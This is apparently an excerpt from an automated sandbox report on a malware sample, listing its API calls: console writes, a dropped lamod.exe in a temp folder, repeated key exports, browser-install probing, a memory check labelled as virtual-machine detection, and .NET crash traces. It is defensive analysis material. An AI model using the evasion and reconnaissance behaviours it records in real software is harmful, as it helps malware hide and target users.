WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: f console_handle: 0x00000007	1	1
WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleW June 13, 2023, 8:29 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\a9e2a16078\lamod.exe console_handle: 0x00000007	1	1
WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: f console_handle: 0x00000007	1	1
WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleW June 13, 2023, 8:29 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\a9e2a16078\lamod.exe console_handle: 0x00000007	1	1
WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: A console_handle: 0x00000007	1	1
WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: r console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 85 events)

Time & API	Arguments	Status	Return
CryptExportKey June 13, 2023, 8:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00899270 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00899270 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00899270 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00899270 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00899230 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00899230 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00899230 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00899230 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00899230 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00899230 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00899230 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x008992b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x008992b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00899470 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00899bb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00899bb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00899a70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370e50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370e50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00376730 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00376730 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00376730 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00376730 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00376730 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00376730 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00376730 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00376730 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00376730 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003767b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003767b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00376970 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003770b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003770b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00376f70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055cc38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055cc38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055cc38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055cc38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055cbf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055cbf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055cbf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055cbf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055cbf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055cbf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055cbf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055cc78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055cc78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055ce38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055d578 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 8:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055d578 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

This executable has a PDB path (1 event)

pdb_path

wextract.pdb

Tries to locate where the browsers are installed (3 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file	C:\Program Files\Mozilla Firefox\firefox.exe
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx June 13, 2023, 8:28 a.m.		1	1	0

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

AVI

One or more processes crashed (50 out of 70 events)

Time & API	Arguments	Status
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0x233d329 0x233d12b 0x2337710 0x2336f0b 0x2333c6b 0x23335d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x233d460 registers.esp: 35057572 registers.edi: 35057624 registers.eax: 0 registers.ebp: 35057636 registers.edx: 8866248 registers.ebx: 35059076 registers.esi: 41362712 registers.ecx: 0	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0xa6ce608 0xa6ca574 0xa6c9e0a 0xa6c9cdd 0xa6c90d0 0xa6c82a0 0x233d9ff 0x2337855 0x2336f0b 0x2333c6b 0x23335d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa6ce64b registers.esp: 35056100 registers.edi: 35056444 registers.eax: 0 registers.ebp: 35056108 registers.edx: 0 registers.ebx: 35059076 registers.esi: 44304812 registers.ecx: 41623132	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0xa6ce608 0xa6ca574 0xa6c9e0a 0xa6c9cf5 0xa6c90d0 0xa6c82a0 0x233d9ff 0x2337855 0x2336f0b 0x2333c6b 0x23335d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa6ce64b registers.esp: 35056100 registers.edi: 35056444 registers.eax: 0 registers.ebp: 35056108 registers.edx: 0 registers.ebx: 35059076 registers.esi: 40997656 registers.ecx: 42927824	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0xa6ce608 0xa6ca574 0xa6c9e0a 0xa6c9cf5 0xa6c90d0 0xa6c82a0 0x233d9ff 0x2337855 0x2336f0b 0x2333c6b 0x23335d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa6ce64b registers.esp: 35056100 registers.edi: 35056444 registers.eax: 0 registers.ebp: 35056108 registers.edx: 0 registers.ebx: 35059076 registers.esi: 40997656 registers.ecx: 44231584	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0xa6ce608 0xa6cf116 0xa6ce9d1 0xa6c9cdd 0xa6c93b9 0xa6c82a0 0x233d9ff 0x2337855 0x2336f0b 0x2333c6b 0x23335d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa6ce64b registers.esp: 35056076 registers.edi: 35056468 registers.eax: 0 registers.ebp: 35056084 registers.edx: 0 registers.ebx: 35059076 registers.esi: 40997656 registers.ecx: 45540424	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0xa6ce608 0xa6cf116 0xa6ce9d1 0xa6c9cf5 0xa6c93b9 0xa6c82a0 0x233d9ff 0x2337855 0x2336f0b 0x2333c6b 0x23335d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa6ce64b registers.esp: 35056076 registers.edi: 35056468 registers.eax: 0 registers.ebp: 35056084 registers.edx: 0 registers.ebx: 35059076 registers.esi: 40997656 registers.ecx: 46887176	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0xa6ce608 0xa6cf116 0xa6ce9d1 0xa6c9cf5 0xa6c93b9 0xa6c82a0 0x233d9ff 0x2337855 0x2336f0b 0x2333c6b 0x23335d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa6ce64b registers.esp: 35056076 registers.edi: 35056468 registers.eax: 0 registers.ebp: 35056084 registers.edx: 0 registers.ebx: 35059076 registers.esi: 40997656 registers.ecx: 41924616	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0xa6ce608 0xa6cfa42 0xa6cf3e9 0xa6c9cdd 0xa6c94d1 0xa6c82a0 0x233d9ff 0x2337855 0x2336f0b 0x2333c6b 0x23335d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa6ce64b registers.esp: 35056128 registers.edi: 35056468 registers.eax: 0 registers.ebp: 35056136 registers.edx: 0 registers.ebx: 35059076 registers.esi: 40974328 registers.ecx: 43271488	1
